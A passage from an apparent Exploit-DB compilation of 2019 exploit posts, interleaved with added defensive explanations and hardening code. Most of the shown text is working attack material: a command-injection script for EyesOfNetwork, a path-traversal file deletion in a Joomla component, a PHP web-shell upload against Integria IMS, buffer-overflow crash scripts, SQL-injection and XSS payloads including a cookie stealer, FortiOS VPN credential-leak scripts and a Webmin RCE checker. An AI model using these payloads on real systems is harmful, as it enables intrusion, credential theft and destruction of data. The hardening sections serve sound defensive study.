- We have minimized the difference between the original and mutated files down to a single byte at offset 0x3bc, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0xB5 (in poc1.pdf) and to 0x35 (in poc2.pdf).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47278.zip
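Reports 2, 3 and 4 above each give a minimized diff: a handful of byte offsets in original.pdf and the before/after values. The script below is an added example (not part of the reports or of the PoC archives) that re-applies those documented mutations to an original.pdf you have extracted yourself, and refuses to write anything if the byte at an offset is not the 0x00 the report says was there, which is the usual way a "wrong original" mistake shows up. The report keys ("47276", "47278-poc1", ...) are names chosen here for convenience; the offsets and values are copied verbatim from the Notes. diff_bytes() does the reverse check, listing the differing offsets between an original and a poc so a minimized diff claim can be verified.

```python
"""Re-apply the minimized byte mutations documented in reports 2, 3 and 4 above.

Added example: not code from the reports or the PoC archives. It assumes
original.pdf has been extracted from the relevant archive. Offsets and byte
values are copied from the reports' Notes; the keys of MUTATIONS are labels
chosen here, not file names from the archives.
"""
import sys
from pathlib import Path

# (offset, byte before mutation, byte after mutation), taken from the report notes.
MUTATIONS = {
    # Report 2 (47276): three bytes inside a TrueType font stream, all 0x00 -> 0xff.
    "47276": [(0x2BD4C, 0x00, 0xFF), (0x2BD4D, 0x00, 0xFF), (0x2D5B8, 0x00, 0xFF)],
    # Report 3 (47277): one byte inside a binary JP2 image stream, 0x00 -> 0xFE.
    "47277": [(0x264A67, 0x00, 0xFE)],
    # Report 4 (47278): one byte in what appears to be a JBIG2Globals object, two variants.
    "47278-poc1": [(0x3BC, 0x00, 0xB5)],
    "47278-poc2": [(0x3BC, 0x00, 0x35)],
}


class MutationError(ValueError):
    """The input does not look like the original the report was minimized against."""


def apply_mutations(data: bytes, mutations) -> bytes:
    """Return a copy of data with each (offset, old, new) applied.

    Every 'old' byte is verified first, so a mismatched original.pdf fails
    instead of silently producing a sample that does not reproduce the crash.
    """
    buf = bytearray(data)
    for offset, old, new in mutations:
        if offset >= len(buf):
            raise MutationError(f"offset {offset:#x} is past the end of the file ({len(buf):#x} bytes)")
        if buf[offset] != old:
            raise MutationError(
                f"byte at {offset:#x} is {buf[offset]:#04x}, expected {old:#04x}; wrong original.pdf?"
            )
        buf[offset] = new
    return bytes(buf)


def mutations_apply_cleanly(data: bytes, mutations) -> bool:
    """True if every mutation's 'old' byte is present in data (nothing is written)."""
    try:
        apply_mutations(data, mutations)
    except MutationError:
        return False
    return True


def diff_bytes(original: bytes, mutated: bytes):
    """List (offset, old, new) for every differing byte: the reverse check, used to
    verify a poc against its original. Equal length is required because these
    minimized diffs change bytes in place rather than inserting or removing them."""
    if len(original) != len(mutated):
        raise MutationError("files differ in length; in-place byte diffs need equal sizes")
    return [(i, a, b) for i, (a, b) in enumerate(zip(original, mutated)) if a != b]


def main(argv):
    if len(argv) != 4 or argv[1] not in MUTATIONS:
        names = "|".join(MUTATIONS)
        print(f"usage: {argv[0]} <{names}> original.pdf output.pdf", file=sys.stderr)
        return 2
    data = Path(argv[2]).read_bytes()
    Path(argv[3]).write_bytes(apply_mutations(data, MUTATIONS[argv[1]]))
    print(f"wrote {argv[3]} with {len(MUTATIONS[argv[1]])} mutated byte(s)")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 mutate.py 47277 original.pdf poc.pdf` against the original.pdf from the matching archive; then `diff_bytes()` on the archive's own poc.pdf and your output should return an empty list if the notes are exact.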
  5. # Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
# Google Dork: N/A
# Date: 2019-08-14
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
# Version: 5.1 < 5.0
# Tested on: Windows 10
# CVE : N/A

#About The Product:
'''
EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT management and governance. EyesOfNetwork Supervision provides event management, availability, problems and capacity.

#Technical Analysis:
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
By looking into tools/snmpwalk.php we will find the vulnerable part of the code:

else{
    $command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
}

In this line we can see that the attacker controls the value of the "$host_name" variable. After that we have the magic function "popen" in the next part of the code:

$handle = popen($command,'r');
echo "<p>";
while($read = fread($handle,100)){
    echo nl2br($read);
    flush();
}
pclose($handle);

And now we can see the use of the "popen" function, which executes the value of $command; if we put the shell metacharacter ";" at the end of the command we will be able to execute OS commands.
'''

#Exploit
import requests
import optparse
import sys
import bs4 as bs

commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL", )
commandList.add_option('-c', '--cmd', action="store", help="Insert command name", )
commandList.add_option('-u', '--user', action="store", help="Insert username", )
commandList.add_option('-p', '--pwd', action="store", help="Insert password", )
options, remainder = commandList.parse_args()

if not options.target or not options.cmd or not options.user or not options.pwd:
    commandList.print_help()
    sys.exit(1)

url = options.target
cmd = options.cmd
user = options.user
pwd = options.pwd

with requests.session() as c:
    link = url
    # Fetch the front page once so the session cookie is set before logging in.
    initial = c.get(link)
    login_data = {"login": user, "mdp": pwd}
    page_login = c.post(str(link) + "/login.php", data=login_data)

    # The snmpwalk tool interpolates host_list into a shell command; ";" ends the
    # snmpwalk invocation and runs the attacker's command afterwards.
    v_url = link + "/module/tool_all/select_tool.php"
    v_data = {"page": "bylistbox",
              "host_list": "127.0.0.1;" + cmd,
              "tool_list": "tools/snmpwalk.php",
              "snmp_com": "mm",
              "snmp_version": "2c",
              "min_port": "1",
              "max_port": "1024",
              "username": '',
              "password": '',
              "snmp_auth_protocol": "MD5",
              "snmp_priv_passphrase": '',
              "snmp_priv_protocol": '',
              "snmp_context": ''}
    page_v = c.post(v_url, data=v_data)

    # The tool echoes popen() output inside <p> elements; print each one.
    my = bs.BeautifulSoup(page_v.content, "lxml")
    for textarea in my.find_all('p'):
        final = textarea.get_text()
        print(final)
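The analysis above boils down to one pattern: a host name is interpolated into a command string that popen() hands to a shell, so ";" (or $(...), backticks, |, &&) in the host field becomes part of the command line. The block below is an added example, not EyesOfNetwork code: it re-creates that pattern in Python, then shows the two fixes a reviewer would ask for, validating the host value against what a host can legitimately look like, and passing an argv list to subprocess so no shell ever sees the value. The snmpwalk command is only built, not executed, so the example runs without net-snmp installed; shell_quoted() shows the fallback when a legacy shell-string API cannot be replaced.

```python
"""Shell-metacharacter injection through a host field, and how to close it.

Added example (not code from EyesOfNetwork). It mirrors the shape of
tools/snmpwalk.php from the report: $host_name interpolated into a string that
popen() runs through a shell. The hardened versions validate the host and use an
argv list, so the value is never interpreted by a shell.
"""
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 host label: letters, digits and hyphens, no leading or trailing hyphen.
_HOST_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def build_command_unsafe(community: str, version: str, host: str) -> str:
    """The vulnerable shape: one string later executed by a shell (popen / shell=True).

    Anything the user puts after ';' becomes a second command."""
    return f"snmpwalk -c {community} -v {version} {host}"


def is_valid_host(host: str) -> bool:
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname; reject the rest.

    Metacharacters such as ';', '$', '`', '|' and whitespace never pass this check."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_HOST_LABEL.match(label) for label in host.split("."))


def build_command_safe(community: str, version: str, host: str) -> list:
    """Validate first, then return an argv list: with no shell involved, ';' is just data."""
    if not is_valid_host(host):
        raise ValueError(f"refusing host value {host!r}")
    if version not in ("1", "2c", "3"):
        raise ValueError(f"unsupported SNMP version {version!r}")
    return ["snmpwalk", "-c", community, "-v", version, host]


def run_safe(community: str, version: str, host: str, timeout: int = 30):
    """How the argv list is executed: subprocess.run without shell=True."""
    return subprocess.run(build_command_safe(community, version, host),
                          capture_output=True, text=True, timeout=timeout)


def shell_quoted(argv) -> str:
    """Fallback when a shell string is unavoidable (a legacy popen()-style API):
    quote every argument so the whole host value is a single shell word."""
    return " ".join(shlex.quote(arg) for arg in argv)


if __name__ == "__main__":
    attacker_host = "127.0.0.1;id"   # the value the PoC above sends in host_list
    print("unsafe :", build_command_unsafe("mm", "2c", attacker_host))
    try:
        build_command_safe("mm", "2c", attacker_host)
    except ValueError as exc:
        print("safe   :", exc)
    print("argv   :", build_command_safe("mm", "2c", "127.0.0.1"))
    print("quoted :", shell_quoted(["snmpwalk", "-c", "mm", "-v", "2c", attacker_host]))
```

Validation alone is the weaker of the two fixes (a future "host" that legitimately contains unusual characters tempts someone to loosen the pattern); the argv list is what actually removes the shell from the data path, and the allowlist then only has to stop snmpwalk from being pointed at arbitrary targets.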
  6. # Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
# Dork: inurl:"index.php?option=com_jsjobs"
# Date: 2019-08-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.joomsky.com/
# Software Link: https://www.joomsky.com/5/download/1
# Version: 1.2.6
# Tested on: Debian/nginx/joomla 3.9.0
# Vulnerability details:
# This vulnerability is caused when processing a custom userfield.

File: site/models/job.php
Function: storeJob
Line: 1240
-------------------------------------
1215        //custom field code start
1216        $customflagforadd = false;
1217        $customflagfordelete = false;
1218        $custom_field_namesforadd = array();
1219        $custom_field_namesfordelete = array();
1220        $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
1221        $params = array();
1222        $forfordelete = '';
1223
1224        foreach ($userfield AS $ufobj) {
1225            $vardata = '';
1226            if($ufobj->userfieldtype == 'file'){
1227                if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
1228                    $vardata = $data[$ufobj->field.'_2'];
1229                }else{
1230                    $vardata = $_FILES[$ufobj->field]['name'];
1231                }
1232                $customflagforadd=true;
1233                $custom_field_namesforadd[]=$ufobj->field;
1234            }else{
1235                $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
1236            }
1237            if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
1238                $customflagfordelete = true;
1239                $forfordelete = $ufobj->field;
1240                $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
1241            }
...snip...
1323        // new
1324        //removing custom field
1325        if($customflagfordelete == true){
1326            foreach ($custom_field_namesfordelete as $key) {
1327                $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
1328            }
1329        }

File: site/models/common.php
Function: uploadOrDeleteFileCustom
Line: 851
-------------------------------------
748        $path = $base . '/' . $datadirectory;
749        if (!file_exists($path)) { // create user directory
750            $this->makeDir($path);
751        }
752        $isupload = false;
753        $path = $path . '/data';
754        if (!file_exists($path)) { // create user directory
755            $this->makeDir($path);
756        }
757        if($for == 3 )
758            $path = $path . '/jobseeker';
759        else
760            $path = $path . '/employer';
761
762        if (!file_exists($path)) { // create user directory
763            $this->makeDir($path);
764        }
...snip...
843        } else { // DELETE FILES
844            if ($isdeletefile == 1) {
845                if($for == 3){
846                    $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
847                }else{
848                    $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
849                }
850                $file = $userpath.$field;
851                unlink($file); //!!!
852            }
853            return 1;
854        }
855    }

#####################################
#PoC:
#####################################
# If an administrator has added a custom userfield 'ufield926' of field type 'file', an attacker can trigger this vulnerability by sending the following requests.

$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"

$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
  7. # Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
# Date: 2019-08-16
# Exploit Author: Greg.Priest
# Vendor Homepage: https://integriaims.com/
# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
# Version: Integria IMS 5.0.86
# Tested on: Windows
# CVE : N/A
# ---------------------------------------------------------------------------------------
# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------
# [Description]
# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------

POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
Host: 10.61.184.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
Content-Type: multipart/form-data; boundary=---------------------------30333176734664
Content-Length: 374
Connection: close
Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
Upgrade-Insecure-Requests: 1

-----------------------------30333176734664
Content-Disposition: form-data; name="curdir"


-----------------------------30333176734664
Content-Disposition: form-data; name="file"; filename="whoami.php"
Content-Type: application/octet-stream

<?php
$output = shell_exec('whoami');
echo "<pre>$output</pre>";
?>
-----------------------------30333176734664--
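Posts 6 and 7 are the same missing check seen from two sides: in post 6 unlink() runs on $userpath.$field with $field taken straight from the request, so "../../../../../configuration.php" walks out of the customfiles directory; in post 7 the upload handler stores whatever filename the client sends, so "whoami.php" lands in a web-served directory. The block below is an added example, not code from JS Jobs or Integria IMS, showing the two checks a server needs: a confine() that only returns a path if it resolves strictly inside the intended directory (rejecting separators and ".." before touching the filesystem, then re-checking after symlink resolution), and a safe_upload_name() that keeps only a basename with an allow-listed extension. The directory layout and the customfiles fixture are constructed for the demonstration.

```python
"""Confining user-supplied file names in delete and upload handlers.

Added example: not code from JS Jobs (post 6) or Integria IMS (post 7).
The helpers below are the checks missing from unlink($userpath.$field) and
from the unfiltered wiki upload; the fixture directory is constructed here.
"""
import os
import re
import tempfile
from pathlib import Path

ALLOWED_UPLOAD_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
# One conservative character set for stored names: alnum start, then alnum . _ -
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class UnsafePath(ValueError):
    """Raised for any name that must not reach the filesystem."""


def confine(base: Path, user_name: str) -> Path:
    """Return base/user_name only if it resolves strictly inside base.

    Separators, '..' and NUL are rejected before any filesystem access; the
    resolved path is then checked again, which also catches a symlink planted
    inside base that points somewhere else."""
    if (not user_name or user_name in (".", "..")
            or "/" in user_name or "\\" in user_name or "\x00" in user_name):
        raise UnsafePath(f"rejecting name {user_name!r}")
    base = base.resolve()
    candidate = (base / user_name).resolve()
    if base not in candidate.parents:
        raise UnsafePath(f"{user_name!r} escapes {base}")
    return candidate


def is_confined(base: Path, user_name: str) -> bool:
    try:
        confine(base, user_name)
    except UnsafePath:
        return False
    return True


def delete_custom_file(base: Path, field: str) -> bool:
    """Hardened counterpart of unlink($userpath.$field): delete only inside base.
    Returns True if a file was removed, False if nothing by that name existed."""
    target = confine(base, field)
    if not target.is_file():
        return False
    target.unlink()
    return True


def safe_upload_name(client_name: str) -> str:
    """Derive the stored name from the client-supplied one.

    Only the basename is used (browsers may send a full path), the extension must
    be allow-listed, and multi-dot names such as shell.php.jpg are refused rather
    than cleaned, since a served directory may map a middle extension to a handler."""
    name = os.path.basename(client_name.replace("\\", "/"))
    if not _SAFE_NAME.match(name):
        raise UnsafePath(f"rejecting upload name {client_name!r}")
    if name.count(".") != 1 or Path(name).suffix.lower() not in ALLOWED_UPLOAD_EXT:
        raise UnsafePath(f"extension not allowed for {client_name!r}")
    return name


def is_acceptable_upload(client_name: str) -> bool:
    try:
        safe_upload_name(client_name)
    except UnsafePath:
        return False
    return True


def demo_dir() -> Path:
    """Constructed fixture: a fresh customfiles directory holding one uploaded image."""
    d = Path(tempfile.mkdtemp(prefix="customfiles_"))
    (d / "valid_image.jpg").write_bytes(b"\xff\xd8\xff\xe0 not a real jpeg")
    return d


if __name__ == "__main__":
    d = demo_dir()
    for name in ("valid_image.jpg", "../../../../../configuration.php", ".."):
        print(f"delete {name!r}: confined={is_confined(d, name)}")
    for name in ("valid_image.jpg", "whoami.php", "shell.php.jpg", "C:\\Users\\bob\\photo.PNG"):
        print(f"upload {name!r}: accepted={is_acceptable_upload(name)}")
    print("deleted:", delete_custom_file(d, "valid_image.jpg"))
```

Note that confine() does not try to normalise a bad name into a good one; a request carrying "../" is an attack indicator and should be rejected and logged, not repaired.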
8. # Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Date: 2019-08-15
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj

# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
# earlier could allow remote NAS HTTP servers to perform DoS via a long response.

# 2. Proof of Concept

import socket
from time import sleep

host = "192.168.0.112"
port = 80

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)

print "\n[+] Listening on %d ..." % port
cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]

evilbuffer = "A" * 6000
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(30)
cl.close()
sock.close()
9. # Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows
# Vulnerable parameter: PF (member_profile.asp)

# GET Request

GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
10. # Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
#            Windows XP SP3

# 1.- Run python code: RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 6000

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
11. # Exploit Title: Kimai 2 - persistent cross-site scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2

1- A normal user will try to add a timesheet from this link http://localhost/index.php/en/timesheet/create
2- Add this payload "><svg/onload=alert('xss')> in the description
3- Save the changes
4- Refresh and we have an alert pop up!

The Request POC :

POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv

timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= "><svg/onload=alert('xss')>&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0
12. # Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SSL VPN FortiOs - System file leak',
      'Description'    => %q{
        FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
        This exploit reads the /dev/cmdb/sslvpn_websession file, which contains logins and passwords in clear text.
        This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
      },
      'References'     =>
        [
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
        ],
      'Author'         => [ 'lynx (Carlos Vieira)' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        },
    ))
  end

  def run()
    print_good("Checking target...")
    res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})

    if res && res.code == 200
      print_good("Target is Vulnerable!")
      data = res.body
      current_host = datastore['RHOST']
      filename = "msf_sslwebsession_"+current_host+".bin"
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing binary file.......")
      parse()
    else
      if(res && res.code == 404)
        print_error("Target not Vulnerable")
      else
        print_error("Ow crap, try again...")
      end
    end
  end

  def parse()
    current_host = datastore['RHOST']
    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
    words = 0
    while (line = fileObj.gets)
      printable_data = line.gsub(/[^[:print:]]/, '.')
      array_data = printable_data.scan(/.{1,60}/m)
      for ar in array_data
        if ar != "............................................................"
          print_good(ar)
        end
      end
      #print_good(printable_data)
    end
    fileObj.close
  end
end
13. # Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()

def leak(host, port):
    print("[!] Leak information...")
    try:
        url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
        headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
        r=requests.get(url, headers=headers, verify=False, stream=True)
        img=r.raw.read()
        if "var fgt_lang =" in str(img):
            with open("sslvpn_websession_"+host+".dat", 'w') as f:
                f.write(img)
                print("[>] Save to file ....")
                parse(host)
                print("\n")
                return True
        else:
            return False
    except requests.exceptions.ConnectionError:
        return False

def is_character_printable(s):
    return all((ord(c) < 127) and (ord(c) >= 32) for c in s)

def is_printable(byte):
    if is_character_printable(byte):
        return byte
    else:
        return '.'

def read_bytes(host, chunksize=8192):
    print("[>] Read bytes from > " + "sslvpn_websession_"+host+".dat")
    with open("sslvpn_websession_"+host+".dat", "rb") as f:
        while True:
            chunk = f.read(chunksize)
            if chunk:
                for b in chunk:
                    yield b
            else:
                break

def parse(host):
    print("[!] Parsing Information...")
    memory_address = 0
    ascii_string = ""
    for byte in read_bytes(host):
        ascii_string = ascii_string + is_printable(byte)
        if memory_address%61 == 60:
            if ascii_string!=".............................................................":
                print ascii_string
            ascii_string = ""
        memory_address = memory_address + 1

def check(host, port):
    print("[!] Check vuln...")
    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    try:
        r = requests.get("https://" + host + ":" + port + uri, verify=False)
        if(r.status_code == 200):
            return True
        elif(r.status_code == 404):
            return False
        else:
            return False
    except:
        return False

def main(host, port):
    print("[+] Start exploiting....")
    vuln = check(host, port)
    if(vuln):
        print("[+] Target is vulnerable!")
        bin_file = leak(host, port)
    else:
        print("[X] Target not vulnerable.")

if __name__ == "__main__":
    if(len(sys.argv) < 3):
        print("Use: python {} ip/dns port".format(sys.argv[0]))
    else:
        host = sys.argv[1]
        port = sys.argv[2]
        main(host, port)
14. # Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79
# CVE: CVE-2020-23518

[Description]

# Neo Billing is an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions) is affected by a stored XSS vulnerability.

[Proof of Concept]

# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] or [//host/neo/crm/tickets/thread/?id=ticketid]

[Example payloads]

# Example payload: "><img src="x" onerror="alert('XSS');">
# Example payload: "><script>alert(document.cookie)</script>

[POST Request]

POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="title"

"><script>alert('XSS')</script>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="content"

<p>"><script>alert('XSS')</script><br></p>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------899768029113033755249127523--
15. #!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag via an echo command and then greps for it. If it matches, the target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ]; then
    echo '\033[0;31mVULNERABLE!\033[0m'
else
    echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi

#EOF
16. # Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
